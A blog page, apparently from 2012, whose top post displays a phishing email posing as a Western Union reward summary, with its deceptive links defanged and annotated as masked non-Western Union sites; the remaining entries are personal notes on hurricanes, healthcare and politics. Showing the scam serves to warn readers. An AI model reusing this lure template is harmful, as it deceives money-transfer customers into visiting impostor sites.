
Western Union Gold Card Reward Summary
Western Union Card Number: 43566235
Points Earned: 85
Total Points: 30

Click here for transaction details [LINK TO NON-WESTERN UNION SITE]


YOU EARNED 3 MINUTES OF PHONE TIME! Your time is loaded directly on your card. Calling instructions are on the card back, or dial 888-628-8862 & enter your personal PIN: 233705064231.


You sent the funds, now make it personal!
Record a greeting with your webcam, upload a photo or send a postcard!
Send a free greeting now at http://wugreetings [DOT] com


Check if the receiver has picked up the money transfer. [LINK TO NON-WESTERN UNION SITE]


IN ADDITION TO THE TRANSFER FEE, WESTERN UNION ALSO MAKES MONEY WHEN IT CHANGES YOUR DOLLARS TO PESOS. PLEASE SEE BELOW FOR MORE INFORMATION REGARDING CURRENCY EXCHANGE.

IN ADDITION TO THE TRANSFER SERVICE FEES, WESTERN UNION ALSO MAKES MONEY WHEN IT CONVERTS YOUR DOLLARS TO PESOS. PLEASE READ BELOW FOR MORE INFORMATION ABOUT THE CURRENCY EXCHANGE.

THE CURRENCY TO BE PAID OUT AND THE EXCHANGE RATE FOR YOUR TRANSACTION WERE DETERMINED AT THE TIME OF SEND IF LISTED ON YOUR RECEIPT. OTHERWISE, THE EXCHANGE RATE WILL BE SET WHEN THE RECEIVER RECEIVES THE FUNDS. PROTECT YOURSELF FROM CONSUMER FRAUD. BE CAREFUL WHEN A STRANGER ASKS YOU TO SEND MONEY. FOR A COMPLETE COPY OF THE TERMS AND CONDITIONS GOVERNING THIS TRANSACTION AND THE SERVICES YOU HAVE SELECTED PLEASE REVIEW AND PRINT THE TERMS AND CONDITIONS.[LINK TO NON-WESTERN UNION SITE]


REFUNDS. PRINCIPAL REFUNDS and cancellation of the money transfer will be made if payment to the Receiver has not been made when Western Union processes Customer's written request. TRANSFER FEE REFUNDS are generally made if funds are not available to the Receiver within Western Union's specified timeframes. Qualifying refunds will be made within 45 days of receipt of Customer's valid written request.


LIMITATIONS OF LIABILITY. IN NO EVENT SHALL WESTERN UNION BE LIABLE FOR DAMAGES FOR DELAY, NONDELIVERY, NONPAYMENT OR UNDERPAYMENT OF ANY SERVICES TRANSACTION, WHETHER CAUSED BY NEGLIGENCE ON THE PART OF ITS EMPLOYEES, SUPPLIERS OR AGENTS OR OTHERWISE, BEYOND THE SUM OF $500 (in addition to refunding the principal amount and the transfer fees), UNLESS THE SENDER HAS OBTAINED A HIGHER LIABILITY LIMIT BY CALLING THE TELEPHONE NUMBER SET FORTH BELOW AND PAYING AN ADDITIONAL CHARGE THEREFOR. IN NO EVENT WILL WESTERN UNION BE LIABLE FOR ANY INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, EXEMPLARY OR PUNITIVE DAMAGES OR THE LIKE. THESE CONDITIONS CANNOT BE CHANGED OR SUPPLEMENTED ORALLY.


CURRENCY EXCHANGE. Payments will generally be in local currency (except that in certain countries payment may be in U.S. dollars or other alternate currency at participating locations). In addition to the transfer fees applicable to this transaction, a currency exchange rate will be applied. United States currency is converted to foreign currency at an exchange rate set by Western Union. Any difference between the rate given to Customers and the rate received by Western Union will be kept by Western Union (and its Agents in some cases) in addition to the transfer fees. Please ask a customer service representative for information concerning the currency exchange rate applicable to your transaction. You may also find out the current foreign exchange rate provided by Western Union to its customers by calling toll-free to 1-800-325-6000.

The transfer fees and the money Western Union (or its Agents) makes when it changes your dollars into foreign currency may vary based upon the payout currency that you select. Some Western Union Agents may offer receivers the choice to receive funds in a currency different from the one you selected. In such instances, Western Union (or its Agents) may make additional money when it changes your funds into the Receiver selected currency.


CURRENCY EXCHANGE. Payments will generally be made in local currency (except that in some countries payment may be made in U.S. dollars or another alternative currency at enabled locations). In addition to the transfer service fees established for this transaction, a currency exchange rate will be applied. For the conversion of United States currency to foreign currency, the exchange rate determined by Western Union will be applied. Any difference between the exchange rate offered to customers and the exchange rate obtained by Western Union, in addition to the transfer service fees, will go to Western Union (and its agents in some cases). Please ask the customer service representative assisting you for information regarding the currency exchange rate that will be applied to your transaction. You may also request information on the current foreign currency exchange rate that Western Union is offering its customers by calling toll-free 1-800-325-4045.

The transfer service charges and the money that Western Union (or its Agencies) earn when changing your dollars into foreign currency may vary according to the payout currency you select. Some Western Union agent locations may offer the Receiver the choice of receiving the money in a currency different from the one you selected. In such cases, Western Union (or its agents) may earn additional money when they change your money into the currency chosen by the Receiver.



WESTERN UNION PRIVACY POLICIES: Western Union may disclose your personal information to third parties as explained in its Privacy Statement ("Statement"). To obtain a copy of the Statement, ask your Western Union Agent or call 1-800-562-2598. Information disclosed may include financial background; identification, such as name and address; transaction information; and other information relating to financial matters. Recipients may include financial institutions; retailers; companies that process transactions or provide other services for us; government agencies; and direct marketers. You may opt out of (direct us not to make) certain disclosures. If you do not opt out, we will assume that you agree that your information may be used as the Statement describes. To opt out, call 1-800-562-2598.


We value your opinion! Go to [LINK TO NON-WESTERN UNION SITE, masked as westernunion [DOT] com] to tell us about our service. Survey code : 2879429247.


If you have any questions, visit us at [LINK TO NON-WESTERN UNION SITE, masked as westernunion [DOT] com]


Thank you for using Western Union!


DO NOT REPLY TO THIS EMAIL. IF YOU HAVE QUESTIONS PLEASE CONTACT US [LINK TO NON-WESTERN UNION SITE]

Wednesday, August 29, 2012

@christoperj:

Anybody who doesn't think we need healthcare reform has never ever gotten an obnoxiously large bill from a provider for Doctor recommended tests, only to find that this very same provider gave the insurance company an astonishing 86.5% discount on the items they agreed to reimburse -- while instead choosing to come after me for the full amount of what the insurance refused to cover.

Clearly somebody at this provider mistakenly thinks I have deeper pockets than my insurance company.

Tuesday, August 28, 2012

@securityguy23:

Rebuilding my lab box after some hardware decided to unexpectedly go all funky chicken over the weekend without the required change control approvals. . .

Seven Years Ago

On a morning not that much unlike this one, and at about this time, I woke up at a friend's apartment after we had spent the night before celebrating my birthday over a few drinks at the Dave and Buster's bar.

My inner weather nerd had been keeping up with a strong though somewhat average hurricane with an exotic sounding name that had moved into the Gulf in the days before. I usually do not remember storm names unless they leave an impression for whatever reason. Alicia in '83 because it made an afternoon at the YMCA day care a little more fun. Andrew in '92 because of the devastation as it crossed Florida. Kyle in '02 because it was the Energizer rabbit of storms, just meandering about the Atlantic for about a month. And some others.

This latest storm didn't really seem all that remarkable, however. It had already smacked Florida around when it came through, if only a little when compared to others in the last year or so. But it admittedly did seem like it was going to be worse by the time it came ashore again. Hard to tell for sure as there had been so many storms in the couple of years prior, and the resulting pre-landfall hype had largely become white noise amongst the 24 hour news cycle.

Anyways, so on that morning still not that much unlike this one, I sat down at the table and went out to the internet looking for the latest storm update. Really wasn't expecting to see that what had been this strong though somewhat average hurricane with the exotic sounding name had doubled in size, with winds that had also jumped from only a 'meager' 115 to an 'oh crap oh crap oh crap' 175 miles an hour.

Deeply scary on paper in all the stats. Even scarier in the satellite photos.

I remember one of the signs of Andrew's strength when it pulverized Florida was how it had wound itself into a nearly perfect tight circle of storm clouds and wind. And how its eye in the center was almost completely clear. It left a lasting visual impression of what a hurricane not to be messed with looks like.

This latest storm looked just the same -- except it was three times larger. It had clearly become the worst case scenario and was only 36 hours offshore.

The National Hurricane Center posted a banner on their website saying "THIS STORM WILL KILL YOU" (or something to that effect) in big bold capitalized red letters as it tried to press the criticality of what was about to happen on anybody who needed to know. And they followed it up with an equally graphic bulletin:

000
WWUS74 KLIX 281550
NPWLIX

URGENT — WEATHER MESSAGE
NATIONAL WEATHER SERVICE NEW ORLEANS LA
1011 AM CDT SUN AUG 28, 2005

...DEVASTATING DAMAGE EXPECTED...

.HURRICANE KATRINA... A MOST POWERFUL HURRICANE WITH UNPRECEDENTED STRENGTH... RIVALING THE INTENSITY OF HURRICANE CAMILLE OF 1969.

MOST OF THE AREA WILL BE UNINHABITABLE FOR WEEKS... PERHAPS LONGER. AT LEAST ONE HALF OF WELL CONSTRUCTED HOMES WILL HAVE ROOF AND WALL FAILURE. ALL GABLED ROOFS WILL FAIL... LEAVING THOSE HOMES SEVERELY DAMAGED OR DESTROYED.

THE MAJORITY OF INDUSTRIAL BUILDINGS WILL BECOME NON FUNCTIONAL. PARTIAL TO COMPLETE WALL AND ROOF FAILURE IS EXPECTED. ALL WOOD FRAMED LOW RISING APARTMENT BUILDINGS WILL BE DESTROYED. CONCRETE BLOCK LOW RISE APARTMENTS WILL SUSTAIN MAJOR DAMAGE... INCLUDING SOME WALL AND ROOF FAILURE.

HIGH RISE OFFICE AND APARTMENT BUILDINGS WILL SWAY DANGEROUSLY... A FEW TO THE POINT OF TOTAL COLLAPSE. ALL WINDOWS WILL BLOW OUT.

AIRBORNE DEBRIS WILL BE WIDESPREAD... AND MAY INCLUDE HEAVY ITEMS SUCH AS HOUSEHOLD APPLIANCES AND EVEN LIGHT VEHICLES. SPORT UTILITY VEHICLES AND LIGHT TRUCKS WILL BE MOVED. THE BLOWN DEBRIS WILL CREATE ADDITIONAL DESTRUCTION. PERSONS... PETS... AND LIVESTOCK EXPOSED TO THE WINDS WILL FACE CERTAIN DEATH IF STRUCK.

POWER OUTAGES WILL LAST FOR WEEKS... AS MOST POWER POLES WILL BE DOWN AND TRANSFORMERS DESTROYED. WATER SHORTAGES WILL MAKE HUMAN SUFFERING INCREDIBLE BY MODERN STANDARDS.

THE VAST MAJORITY OF NATIVE TREES WILL BE SNAPPED OR UPROOTED. ONLY THE HEARTIEST WILL REMAIN STANDING...BUT BE TOTALLY DEFOLIATED. FEW CROPS WILL REMAIN. LIVESTOCK LEFT EXPOSED TO THE WINDS WILL BE KILLED.

AN INLAND HURRICANE WIND WARNING IS ISSUED WHEN SUSTAINED WINDS NEAR HURRICANE FORCE... OR FREQUENT GUSTS AT OR ABOVE HURRICANE FORCE... ARE CERTAIN WITHIN THE NEXT 12 TO 24 HOURS.

ONCE TROPICAL STORM AND HURRICANE FORCE WINDS ONSET... DO NOT VENTURE OUTSIDE!

I have never read or heard such an apocalyptic alert issued in a real world situation and hope I never do again.

While Katrina made a disturbingly memorable name for herself, she thankfully lost some strength in the day or so before making its final landfall. It could have been much much MUCH worse had the storm of this day come ashore at that moment. And when a strong Hurricane Rita came ashore about a month later, everybody who cared paid attention and reacted accordingly.

Seven years later, I find myself again catering to my inner weather nerd and checking on another storm with a somewhat exotic sounding name heading towards New Orleans. I'm relieved to see this latest one seems to be mimicking its sister only by route and schedule -- if (probably) not by strength. Although there is still time on the clock for the unforeseen to happen.

But what a weird weird irony that this is all eerily unfolding again, seven years to the day when the last one came through.

Monday, August 27, 2012

Huzzah

Since 1974. . .

Sunday, August 26, 2012

Perhaps Another Wake Up Call?

Wondering if Hurricane Isaac's direct impact on the RNC convention will spark a true and civil bipartisan conversation about climate change and societal environmental responsibilities. . .

Saturday, August 25, 2012

Friday, August 24, 2012

@christoperj:

Yet another shooting by an unbalanced individual. Seriously, how many more of these does there have to be before we have a constructive non-political conversation on the best ways to prevent such stupidity?

Thursday, August 23, 2012

@christoperj:

Good golly. What is it about politics and news cycles that gives such high pedestals to the handful of extreme voices on either side of an argument -- instead of the majority of those who simply want to get stuff done and move on?

Tuesday, August 14, 2012

Sunday, August 12, 2012

Bracing for Wind and Hail

Need rain, but not like this. . .

Wednesday, August 8, 2012

If Wishes were Horses

Wondering if today will be the day when it will finally rain at the Fort.

Tuesday, August 7, 2012

Thursday, August 2, 2012

Reality Check

Anybody who is surprised the founder of Chick-Fil-A has deep religious beliefs has never tried to buy nuggets and waffle fries on Sunday.